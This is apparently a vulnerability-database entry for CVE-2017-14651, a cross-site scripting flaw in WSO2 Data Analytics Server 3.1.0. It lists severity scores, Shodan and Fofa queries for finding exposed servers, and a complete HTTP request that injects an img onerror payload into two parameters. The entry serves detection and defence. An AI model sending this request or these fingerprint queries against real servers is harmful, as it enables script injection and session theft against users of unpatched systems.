🔙 목록으로 돌아가기

CVE-2017-14651: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting

TitleWSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
Authormass0ma
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationUpgrade to a patched version of WSO2 Data Analytics Server or apply the necessary security patches provided by the vendor.
CVSS Score4.8
EPSS Score0.07641
CVE IDCVE-2017-14651
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:1398055326
Fofa Queryicon_hash=1398055326
Tags cve cve2017 wso2 xss vuln

🔍 Vulnerability Description

WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.

🌐 HTTP Request

GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-14651.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-14651.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A